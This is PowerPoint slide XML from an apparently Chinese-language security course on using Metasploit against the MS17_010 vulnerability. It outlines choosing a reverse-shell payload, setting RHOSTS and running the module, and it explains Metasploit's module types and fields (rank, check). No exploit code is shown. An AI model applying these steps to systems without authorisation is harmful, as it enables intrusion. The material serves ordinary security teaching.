              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般来讲有默认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以不设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但也可以设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般设置的是可以反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>看看有哪些参数需要设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一般来讲就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RHOSTS,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程靶机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>8. run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5F30AF-B5BC-BF07-E1B8-81D4F8AB3B05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="172994" y="947495"/>
            <a:ext cx="10972800" cy="109360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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞实施攻击（略）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19265198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251E790-4FAC-A611-7607-18EC9CED9745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="206758" y="1918436"/>
            <a:ext cx="11523788" cy="4437916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59658E3C-72A0-5382-1E5A-8F8B24A8DED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032348" y="6356352"/>
            <a:ext cx="7872608" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为攻击模块                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>auxiliary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为辅助扫描模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581A763C-CFA0-A05E-EB8B-04201ADD7421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="135416" y="981462"/>
            <a:ext cx="10972800" cy="109360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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞实施攻击（略）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19755853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CFF9CA2-CDDD-93F4-F2BB-05CF24D6A56B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E141AB17-70F1-9607-D97A-84F1F305EBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677057" y="1771787"/>
            <a:ext cx="10180530" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：代表名字。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：表示披露的时间。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> : 表示模块的可靠性分别对应四级“Excellent”：表示该模块的效果非常好，准确率较高，而且测试情况较广泛，被认为是最可靠的模块。“Great”：表示该模块效果不错，准确率较高，但测试情况可能较少，被认为是比较可靠的模块。“Normal”：表示该模块效果一般，测试手段较单一，存在一定漏洞，可靠性较差。“Average”：表示该模块的效果一般，测试情况较少，被认为是比较不可靠的模块。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>heck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 指的是该模块是否支持漏洞检测。模块的check 为yes，那么使用该模块可以先检测目标主机是否存在漏洞，以避免不必要的攻击，模块check 为No，它就只能用于攻击或者利用漏洞，使用此类模块时需格外小心，避免造成不必要的损失​。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>escription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：它是描述漏洞或者模块的详细介绍。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B280CAF7-1AE7-2F7F-0E02-D9E65E2627B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="135416" y="754247"/>
            <a:ext cx="10972800" cy="109360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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS17_010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>漏洞实施攻击（略）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
